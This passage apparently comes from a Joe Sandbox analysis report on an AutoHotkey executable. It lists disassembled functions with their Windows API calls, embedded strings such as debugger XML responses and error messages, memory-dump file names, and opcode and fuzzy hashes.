                                      • Instruction Fuzzy Hash: BEE0C9A5F41A1131DE2961255E027EF90880F11707F98057FBC48E16C9F68EDDD6D0BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00479600 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 360COMMON
                                      Download Yara Rule
                                      Strings
                                      • Too few parameters passed to function., xrefs: 0047962E
                                      • Parameter #2 invalid., xrefs: 0047983F
                                      • Parameter #1 invalid., xrefs: 004796B6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Parameter #1 invalid.$Parameter #2 invalid.$Too few parameters passed to function.
                                      • API String ID: 0-982959277
                                      • Opcode ID: 2ba94e84eea023d7931f8f208e9a98c14f54be12c39add66d1bc98eac8bbd131
                                      • Instruction ID: 323e6a2a06831ad46e16a493863aa910e71cb944f2e73ec95725d67e05fe1321
                                      • Opcode Fuzzy Hash: 2ba94e84eea023d7931f8f208e9a98c14f54be12c39add66d1bc98eac8bbd131
                                      • Instruction Fuzzy Hash: AFD16C716042069FDB14CF19C580AABB3E1FB84318F14CA2FE85987341D779ED55CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004080C6 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 280COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: <exception>$<response command="property_set" success="%i" transaction_id="%e"/>$OU@$float$integer$string
                                      • API String ID: 269201875-251188936
                                      • Opcode ID: 5b646af94fb7b5472deeacfe5ece99372dba85d711dd5f442bf5f4f2d619528f
                                      • Instruction ID: ea7e7c0c8152a396bd99c501e86dc5d209398b458e9bff96b0edc4aa1427ebf3
                                      • Opcode Fuzzy Hash: 5b646af94fb7b5472deeacfe5ece99372dba85d711dd5f442bf5f4f2d619528f
                                      • Instruction Fuzzy Hash: 98A1CF711083029FC710CF25C681A2BBBE5BB94754F144A2FF8D5AB2C1DB39D942CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045A260 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 273COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign$__wcsnicmp
                                      • String ID: GDI+$Icon
                                      • API String ID: 1066767119-2641797909
                                      • Opcode ID: 14dd2da963c5e33db04d023e31245f0d8be0bba2200e09e10fa6c681d7f62fa0
                                      • Instruction ID: a90b1513ac67f8cb14990d5fcab72feaa32ed209691aca3dd47fe741971440c7
                                      • Opcode Fuzzy Hash: 14dd2da963c5e33db04d023e31245f0d8be0bba2200e09e10fa6c681d7f62fa0
                                      • Instruction Fuzzy Hash: A191F4715002009BC7209F198846B3B77E09F85719F144A6FFC869B392E378DD69C7AB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00438330 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free_wcsncpy$_malloc_wcschr
                                      • String ID: Out of memory.
                                      • API String ID: 609840974-4087320997
                                      • Opcode ID: 7e0c9e94e2ee208a637c642467774ddff0c7be2fc2e1f1ed0a543aad5e89ea21
                                      • Instruction ID: cd064838ee68a4cbfcef6521c801cb1d8a79460dee6fc2d10f3a0395d6e69a81
                                      • Opcode Fuzzy Hash: 7e0c9e94e2ee208a637c642467774ddff0c7be2fc2e1f1ed0a543aad5e89ea21
                                      • Instruction Fuzzy Hash: 3B919FB1E002169BCF20DF58C841AAAF3B5EF98300F14505FF84997341EB79AE51CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00458270 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 224windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(02C50FB0,00001032,00000000,00000000), ref: 0045834F
                                      • __wcsnicmp.LIBCMT ref: 0045836A
                                      • SendMessageW.USER32(02C50FB0,00001004,00000000,00000000), ref: 004583A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$__wcsnicmp
                                      • String ID: Col
                                      • API String ID: 2103314646-737980560
                                      • Opcode ID: d5efc11f1e9e223843c4b0948a52296deb1a25f765792460e65b3dc2ffa677e2
                                      • Instruction ID: 263f4e8d9834074fc1ec893a6b5fe48e5be853a356a0d61678cf834c9888f934
                                      • Opcode Fuzzy Hash: d5efc11f1e9e223843c4b0948a52296deb1a25f765792460e65b3dc2ffa677e2
                                      • Instruction Fuzzy Hash: BB61D1716003028BD720DF29D881B2AB7E4EB95716F10456FFD45A7382EF39DC49C6AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409044 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 206COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __ultow
                                      • String ID: &%s;$amp$apos$quot
                                      • API String ID: 2316798077-350231602
                                      • Opcode ID: b2b92453d82d77812000b86d581072dc97e768d685eb95547e74d3ca11d767e4
                                      • Instruction ID: 1885f5021236f6ff472df57e361ee7b55e5cefd21785e4f65e8c0ac3811f1551
                                      • Opcode Fuzzy Hash: b2b92453d82d77812000b86d581072dc97e768d685eb95547e74d3ca11d767e4
                                      • Instruction Fuzzy Hash: 1A61EA30604206ABEF14CF58C488676B7B1EB52304F2444BFD482BB7D3D6399E46D759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412480 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 170sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperW.USER32(?,?,?,?,?,00402190,?,?), ref: 00412561
                                      • CharUpperW.USER32(?,?,?,?,?,00402190,?,?), ref: 00412572
                                      • __swprintf.LIBCMT ref: 004125DC
                                      • Sleep.KERNEL32(00000000), ref: 00412651
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CharUpper$Sleep__swprintf
                                      • String ID: %s%c${Raw}${Text}
                                      • API String ID: 676149037-2444501380
                                      • Opcode ID: d4e5a247d4b8ea13b8c6cf8cdab22fe946192cb4facecacf7122fed73752beba
                                      • Instruction ID: bc389fd488c8ea59aed5ba1bb2efad553bf02c72d67c668d2e9a80ac614513e4
                                      • Opcode Fuzzy Hash: d4e5a247d4b8ea13b8c6cf8cdab22fe946192cb4facecacf7122fed73752beba
                                      • Instruction Fuzzy Hash: 5551D1306047459BDB209F2985907EBBBE1FF89304F04492EE8CAC7391E7B8E894C759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406215 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 159networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAAsyncSelect.WSOCK32(FFFFFFFF,00000000,00000000,00000000,00000001,00000000), ref: 00406230
                                      • _memmove.LIBCMT ref: 00406341
                                      • ioctlsocket.WSOCK32(FFFFFFFF,8004667E,?), ref: 00406242
                                        • Part of subcall function 0040895F: #16.WSOCK32(FFFFFFFF,00000000,00000000,00000000,004DA6A0,?,00000000,0040635D,?), ref: 004089B3
                                      • WSAAsyncSelect.WSOCK32(FFFFFFFF,00000408,00000021,?), ref: 004063D5
                                      Strings
                                      • <response command="%s" transaction_id="%e, xrefs: 004062E7
                                      • <error code="%i"/></response>, xrefs: 00406305
                                      • <response command="%s" transaction_id="%e"/>, xrefs: 00406390
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AsyncSelect$_memmoveioctlsocket
                                      • String ID: <error code="%i"/></response>$<response command="%s" transaction_id="%e$<response command="%s" transaction_id="%e"/>
                                      • API String ID: 1565968819-3791457405
                                      • Opcode ID: 6293f0b70115966cd890f029f067f341165aeb261ffacef0fc3cfd90e9beaf65
                                      • Instruction ID: a0d4fea40d04f298390c3b6366d4478668eaeb7cb91e1d43c9ed42f2878b4ebb
                                      • Opcode Fuzzy Hash: 6293f0b70115966cd890f029f067f341165aeb261ffacef0fc3cfd90e9beaf65
                                      • Instruction Fuzzy Hash: D45107716003059FCB21ABA48D80AAFB7F9EF04318F11067FE953A26D1DB79E915CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043A716 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 152COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Extra$File$Line$Message$The current thread will exit.$__Delete will now return.
                                      • API String ID: 3832890014-175628360
                                      • Opcode ID: 50d2c3bdaa089d4f3d6cddae98d8302b718adf4fe73319883dbae5867f643d73
                                      • Instruction ID: eaa58461f46acdebf79f04a6496b7663cd2e516db01c17dd502ae03936a8bde0
                                      • Opcode Fuzzy Hash: 50d2c3bdaa089d4f3d6cddae98d8302b718adf4fe73319883dbae5867f643d73
                                      • Instruction Fuzzy Hash: 9A51D1307842009FD718EB148841B6A73E0AB88758F09546EFAC4AB392D77DDD66C79F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00477020 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcsicoll.LIBCMT ref: 00477048
                                      • CreatePopupMenu.USER32 ref: 00477074
                                      • SetMenuDefaultItem.USER32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00477448), ref: 004770B8
                                      • SetMenuInfo.USER32 ref: 004770FE
                                      • SetMenuInfo.USER32 ref: 00477121
                                      • CreateMenu.USER32 ref: 00477137
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Menu$CreateInfo$DefaultItemPopup__wcsicoll
                                      • String ID: tray
                                      • API String ID: 3246407819-3344156567
                                      • Opcode ID: 8b47f5f2684e0ee5814e0879d7ca6895583ab5354028b432afb37b8cdcf1da0c
                                      • Instruction ID: 947ce2e608446726554db0e0f7efeb127ec8dadf31759c310087540cbe648b85
                                      • Opcode Fuzzy Hash: 8b47f5f2684e0ee5814e0879d7ca6895583ab5354028b432afb37b8cdcf1da0c
                                      • Instruction Fuzzy Hash: 84316C716087419FD720DF29C944B9BBBE5BF88704F548A1EE88D93750E778E8048B9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0049D5B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0049D5C4
                                        • Part of subcall function 0049DF62: __getptd_noexit.LIBCMT ref: 0049DF65
                                        • Part of subcall function 0049DF62: __amsg_exit.LIBCMT ref: 0049DF72
                                      • __amsg_exit.LIBCMT ref: 0049D5E4
                                      • __lock.LIBCMT ref: 0049D5F4
                                      • InterlockedDecrement.KERNEL32(?), ref: 0049D611
                                      • _free.LIBCMT ref: 0049D624
                                      • InterlockedIncrement.KERNEL32(02D92CE0), ref: 0049D63C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID: `@M
                                      • API String ID: 3470314060-1333944346
                                      • Opcode ID: 573b3ed20a71bd5f659af121bbfd634c332faa6f251ed7d2f4ce13b26854a822
                                      • Instruction ID: 7e5a71eb571a4062cb2ac3217691c3a90a173eca235a37da356c3c3c2da90d2f
                                      • Opcode Fuzzy Hash: 573b3ed20a71bd5f659af121bbfd634c332faa6f251ed7d2f4ce13b26854a822
                                      • Instruction Fuzzy Hash: B301C432D01621ABCF11AF699806B5E7F60BF44725F11803BE406A7280DB3CAD81CBDD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00468334 Relevance: 12.1, APIs: 8, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00468001
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00468358
                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00468375
                                      • GetForegroundWindow.USER32 ref: 0046838C
                                      • GetFocus.USER32 ref: 00468397
                                      • EnableWindow.USER32(?,00000000), ref: 004683B5
                                      • GetFocus.USER32 ref: 004683BF
                                      • SetFocus.USER32(?), ref: 004683CD
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FocusWindow$EnableForegroundLongMessageSend_free
                                      • String ID:
                                      • API String ID: 3052119755-0
                                      • Opcode ID: 02da4894517ef00b9a46d8e4a0c650a935d787487ef7698c3a92ea0f7426b96b
                                      • Instruction ID: 52e4c2df40dd0d5995f3717137ccf4beeee9f9f00966a9dbfd038161cd62d1b3
                                      • Opcode Fuzzy Hash: 02da4894517ef00b9a46d8e4a0c650a935d787487ef7698c3a92ea0f7426b96b
                                      • Instruction Fuzzy Hash: 6921F870A042049BDB109F74DC94B5F3BA0AB55720F18862FF8568B380EB79D941DB1F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00462660 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 283COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: =$=$Next
                                      • API String ID: 0-1239710179
                                      • Opcode ID: dc9dd342dfc16d3f3eabcc8ac0d8b797d0f112ffa1d712f29ba8b74a49aaf177
                                      • Instruction ID: 866ada5e4e5a5a78902083bbf2e2a33570dab7e46549db43fcecda7eeee6e469
                                      • Opcode Fuzzy Hash: dc9dd342dfc16d3f3eabcc8ac0d8b797d0f112ffa1d712f29ba8b74a49aaf177
                                      • Instruction Fuzzy Hash: DDB1BEB1A08785AFC724DF54C981A5BB7E0BB85304F44492FF19987391E7B8D849CB4B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004083FE Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 264COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • </response>, xrefs: 004086D1
                                      • <response command="source" success="0" transaction_id="%e"/>, xrefs: 0040872A
                                      • <response command="source" success="1" transaction_id="%e" encoding="base64">, xrefs: 0040856C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcstoui64$__wcsicoll
                                      • String ID: </response>$<response command="source" success="0" transaction_id="%e"/>$<response command="source" success="1" transaction_id="%e" encoding="base64">
                                      • API String ID: 400967290-3891583944
                                      • Opcode ID: 3d59892804f93d2430410bdb32401bf7b2d59b9f9cfec3c486383cdca5ca5682
                                      • Instruction ID: 0e36fcbb1e22d9825cb84a5c7b15b6e39fb81a455be12b99d2f99ce50ef03238
                                      • Opcode Fuzzy Hash: 3d59892804f93d2430410bdb32401bf7b2d59b9f9cfec3c486383cdca5ca5682
                                      • Instruction Fuzzy Hash: 9191CF311083419BD720DF29CA81B5BB7E4AB94314F144A3EF5D4E72D2EB39D8058B6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044C630 Relevance: 10.8, APIs: 7, Instructions: 253COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcstoi64.LIBCMT ref: 0044C66F
                                        • Part of subcall function 0049A060: wcstoxq.LIBCMT ref: 0049A081
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcstoi64wcstoxq
                                      • String ID:
                                      • API String ID: 2194140525-0
                                      • Opcode ID: a96fc1622a8cad5d22cff9e1e6456e46a53199aa9b42a8b1bcf950152149f4d9
                                      • Instruction ID: 50ece932841a029463a5d57d7f4fa014c0860c94bd5a9321900d5679743e54f0
                                      • Opcode Fuzzy Hash: a96fc1622a8cad5d22cff9e1e6456e46a53199aa9b42a8b1bcf950152149f4d9
                                      • Instruction Fuzzy Hash: 2BA1F1716093019BE360DF25DC81F5BB7E4BB84B14F184A2FF5949B2D0DB78A805CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00423550 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(0002044A,00000009,0000000A,00000000), ref: 00423684
                                      • KillTimer.USER32(0002044A,00000009), ref: 004236CD
                                      • __wcstoi64.LIBCMT ref: 00423751
                                      • __fassign.LIBCMT ref: 004237E1
                                      • GetTickCount.KERNEL32 ref: 00423805
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Timer__fassign$CountKillTick__wcstoi64
                                      • String ID: Out of memory.
                                      • API String ID: 925375575-4087320997
                                      • Opcode ID: 17a019a68782e432456c5e20817b237dbaef85f5ffde172dd320f88de4622f9f
                                      • Instruction ID: 1b0ba90a2ca323a07b83d4e7e28bad831eab04f26b33dcde371b281977b79573
                                      • Opcode Fuzzy Hash: 17a019a68782e432456c5e20817b237dbaef85f5ffde172dd320f88de4622f9f
                                      • Instruction Fuzzy Hash: 518126F1B00360ABDF349F15A880727BBF4AF51705F58446FE4868A791E37C9A84C79A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045E5B0 Relevance: 10.7, APIs: 7, Instructions: 205comCOMMON
                                      Download Yara Rule
                                      APIs
